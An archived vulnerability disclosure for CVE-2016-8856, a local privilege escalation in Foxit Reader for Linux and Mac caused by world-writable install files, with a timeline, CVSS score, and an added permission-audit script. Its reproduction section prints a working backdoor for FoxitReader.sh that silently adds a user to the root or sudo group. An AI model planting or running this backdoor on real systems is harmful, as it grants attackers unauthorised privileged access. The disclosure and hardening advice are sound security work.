[Archive] CVE-2016-8856: Foxit Reader for Linux and Mac: Local Privilege Escalation Writeup
Originally published on: 20 October 2016
TL;DR: I found a local privilege escalation bug in Foxit Reader for Mac and Linux. Random find, had to run ls -la to find this. The issue has been assigned CVE-2016-8856.
Introduction
Recently, I stumbled on a very simple bug in Foxit Reader for Mac and Linux (from here on, just Foxit Reader). The vulnerability was caused by improper file permissions granted to core Foxit Reader files on Linux and Mac systems. An attacker with low-privilege access could have exploited this vulnerability to elevate their privileges, execute commands as a higher-privileged user, or both.
The versions affected were:
Foxit Reader for Mac 2.1.0.0804 and earlier
Foxit Reader for Linux 2.1.0.0805 and earlier
A fixed version has been released and a security bulletin is published here - https://www.foxitsoftware.com/support/security-bulletins.php.
About the Bug
The issue is caused by the way Foxit Reader installs itself on the Linux/Mac machine. At the time of installation, the user is given a choice of where they want to install Foxit. The default installation locations are:
On Linux
sudo or root user - /opt/
normal user - ~/opt/
On Mac
/Applications/Foxit Reader.app/
The issue exists in the file permissions assigned to the installed files. The installer assigns "rwxrwxrwx" (0777) permissions to most of the files in the installation folder. Among these files, the most important ones are:
FoxitReader.sh and updater.sh on Linux (tested on Debian 8 Jessie)
FoxitReader and updater.app/Contents/MacOS/updater on OS X (tested on Yosemite)
These files are used to launch Foxit Reader and to update it, respectively. Since these files are world-writable, any logged-in user with limited privileges can write to them. After that, whenever a privileged user opens the Foxit Reader application, the attacker's custom code runs with that user's privileges.
Reproduction / Exploit Example
The steps described below show how the vulnerability could be exploited on a Linux-based OS. We have tested this on Debian 8.
1. Search for the Foxit Reader installation on the system. If it is not found in the default locations mentioned above, you can use the following command to search for it:
find / -iname foxit\* 2> /dev/null
2. Go to installation folder, generally foxitsoftware/foxitreader/.
3. Open FoxitReader.sh and replace the content with this:
#!/bin/bash
appname="FoxitReader"
selfpath="/opt/foxitsoftware/foxitreader"
LD_LIBRARY_PATH=$selfpath/lib:$selfpath/platforms:$selfpath/printsupport:$selfpath/rmssdk:$selfpath/sensors:$selfpath/imageformats:$selfpath/platforminputcontexts:$LD_LIBRARY_PATH
export LD_LIBRARY_PATH
# Backdoor starts from here
if [ "$(id | grep root | wc -l)" == 1 ]
then
adduser temp root
elif [ "$(groups | grep sudo | wc -l)" == 1 ]
then
gksudo -- bash -c 'foxit_command_which_does_not_exist_but_hides_our_original_command 2> /dev/null; sudo adduser temp sudo;'
fi
# Backdoor ends
exec "$selfpath/$appname" "$@"
4. Wait for root/sudo user to open Foxit Reader.
5. ???
6. Profit.
CVSS
CVSS v3 Base Score: 7.8 High
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Timeline
18-09-2016 Vendor notified about the bug.
19-09-2016 Vendor replies they are looking into the issue.
28-09-2016 Vendor confirms and fixes the bug.
18-10-2016 New version with fix released. Applied for CVE.
19-10-2016 CVE-2016-8856 assigned to the vulnerability.
Takeaway
Always make sure that files on your system only have the permissions they require. Don't be that guy who chmod's 777 on every file. Another issue is files with the SUID/SGID bits set, but that is a topic for another day/blog post.
Also, to search for world-writable directories (ones without the sticky bit set) on your system, run the following command:
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
Source: an excellent reference for Linux privilege escalation basics.
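As an added example (not part of the original post), here is a small POSIX shell audit that goes beyond the one-liner above: it lists world-writable regular files as well as non-sticky directories under an install tree, counts them so a check can fail, and strips the group/other write bits so launcher scripts like FoxitReader.sh stay executable but are no longer modifiable by other users. The default path is the Linux root-install location mentioned above; the function names are my own.

```sh
#!/bin/sh
# Added example, not code from the original post or from Foxit.
# Audit an install tree for world-writable entries, the class of
# defect behind CVE-2016-8856. Assumes a POSIX find/chmod.

# Print every regular file or directory under $1 that is world-writable.
# Directories with the sticky bit (like /tmp) are excluded, since other
# users cannot rename or replace files they do not own there.
find_world_writable() {
    dir="${1:-/opt/foxitsoftware/foxitreader}"   # default from the post
    find "$dir" -xdev \( \( -type f -perm -0002 \) -o \
        \( -type d -perm -0002 ! -perm -1000 \) \) -print 2>/dev/null
}

# Count the hits, so a deployment or CI check can fail when any exist.
count_world_writable() {
    find_world_writable "$1" | wc -l | tr -d ' '
}

# Remediate: remove the group/other write bits but keep the exec bits,
# so scripts remain runnable while only the owner can change them.
harden_tree() {
    dir="${1:-/opt/foxitsoftware/foxitreader}"
    find_world_writable "$dir" | while IFS= read -r path; do
        chmod go-w "$path"
    done
}
```

Run `count_world_writable /opt/foxitsoftware/foxitreader` after an install; anything other than 0 means another local user can alter files a privileged user will later execute.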
Kudos to Foxit's Security Team for prompt acknowledgement and fix.